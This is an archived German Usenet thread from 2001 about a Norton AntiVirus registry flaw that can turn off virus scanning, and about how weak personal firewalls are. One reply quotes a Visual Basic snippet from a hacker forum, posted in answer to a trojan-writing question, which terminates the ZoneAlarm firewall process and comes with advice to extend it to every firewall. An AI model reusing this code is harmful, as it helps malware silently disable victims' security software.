Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Norton Antivirus nicht virensicher

24 views
Skip to first unread message

Michael Simon

unread,
Jun 25, 2001, 9:24:12 AM6/25/01
to
Bug erlaubt es AngreiferInnen, den Schutz zu deaktivieren

Wie das Online Magazin "The Register" berichtet, wurde ein
schwerwiegendes Sicherheitsloch in Norton Anti-Virus (NAV) entdeckt.
Durch eine einfache Änderung des Registry-Schlüssels "NAV 2001" ist
es möglich, den Viren-Check zu deaktivieren, wiederhergestellt
werden kann die Funktionalität erst wieder durch eine manuelle
Änderung des Registry-Eintrags oder eine Neuinstallation.

Nur halb so schlimm?

Eine Sprecherin von Symantec meint dazu, daß lediglich der manuelle
Virencheck von dieser Sicherheitslücke betroffen sei, das
automatisierte Überprüfen sei standardmäßig eingeschalten und werde
nicht durch einen Registry-Eintrag gesteuert. Trotzdem wolle man den
besagten Registry-Schlüssel in zukünftigen Produkten nicht mehr
verwenden. (Quelle: WebStandard)

--
Sicherheit im Kabelnetzwerk
http://www.home.pages.at/heaven/sec.htm
Security for Cable Networks
http://www.dslreports.com/security/

Holger Gahrig

unread,
Jun 28, 2001, 2:41:18 PM6/28/01
to

dirk wrote:

Poste bitte mit Realname und echter e-mail Adresse.

> > Bug erlaubt es AngreiferInnen, den Schutz zu deaktivieren
> >

> > [...]
>
> man sollte besser zonalarm installieren.
> bei mir hat das schon viele angriffe
> gestoppt oder zumindest gmeldet

Was für "Angriffe" Portscans von Scriptkids? Huh wie grausam.

Schau Dir das mal an, aus buha-Forum, Antwort von "moskito123" auf die
Frage "Ich programmiere einen Trojaner und wie kille ich Firewalls":

[zitat]
Och, das mit dem Fragen ob der Firewall geschlossen werden darf ist
überhaupt kein Problem! Wenn ihr den Task mit TerminateProcess beendet,
macht der kein Muks mehr.
Der Beispielcode beendet ZoneAlarm auf jedem Rechner kurz und
schmerzlos.

Code:

Option Explicit
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub

End Code

Jetzt den Titel des Fenster jedes Firewalls herausfinden, den Code
umschreiben dass er alle durchgeht, und der PC ist Firewallfrei.

mfg Moskito

PS: Etwas gutes ist, dass das Icon im Systemstray noch erhalten bleibt
solange der User nicht mit der Maus darüberfährt.

PPS: Wehe dem der mir einen Tojaner schickt... ich habe nämlich auch
ZoneAlarm drauf
[/zitat]

Alles logisch nur das PPS verstehe ich nicht. er weiss wie mans killt,
nimmt ihn aber trotzdem, irgendwie beknackt.

Es gibt noch mehr Möglichkeiten z.B. Trojaner gibt sich als MUA aus usw.

CU

Holger

--
"Woher soll ich wissen was ich denke bevor ich lese was ich poste."
---Ansgar Kursawe in c.t.c---

Immo 'FaUl' Wehrenberg

unread,
Jun 28, 2001, 1:56:30 PM6/28/01
to
begin followup to the posting of Holger Gahrig:
> Code:
>
> Option Explicit
> Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
> Long) As Long
> Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
> As Long, ByVal uExitCode As Long) As Long
> Private Declare Function OpenProcess Lib "kernel32" (ByVal
> dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
> As Long) As Long
[...]
> End Code

Was ist das denn für eine perverse Sprache? VB?

FaUl
end
This article does not support incompatible and broken newsreaders.
--
okay, have a sig then

Holger Gahrig

unread,
Jun 28, 2001, 3:17:16 PM6/28/01
to

Immo 'FaUl' Wehrenberg wrote:
>
> begin followup to the posting of Holger Gahrig:
> > Code:
> >
> > Option Explicit
> > Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
> > Long) As Long
> > Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
> > As Long, ByVal uExitCode As Long) As Long
> > Private Declare Function OpenProcess Lib "kernel32" (ByVal
> > dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
> > As Long) As Long
> [...]
> > End Code
>
> Was ist das denn für eine perverse Sprache? VB?

:-) Klingt so. Siehste man nicht mal eine "gute" Sprache beherrchen um
einen PF auszuhebeln :-).

Florian Weimer

unread,
Aug 5, 2001, 1:23:51 PM8/5/01
to
Michael Simon <AXGGEF...@spammotel.com> writes:

> Wie das Online Magazin "The Register" berichtet, wurde ein
> schwerwiegendes Sicherheitsloch in Norton Anti-Virus (NAV) entdeckt.
> Durch eine einfache Änderung des Registry-Schlüssels "NAV 2001" ist
> es möglich, den Viren-Check zu deaktivieren, wiederhergestellt
> werden kann die Funktionalität erst wieder durch eine manuelle
> Änderung des Registry-Eintrags oder eine Neuinstallation.

Wenn ich die Registry ändern kann, dann kann ich wahrscheinlich auch
die Binaries des Virenscanners durch solche ersetzen, die nichts
machen.

0 new messages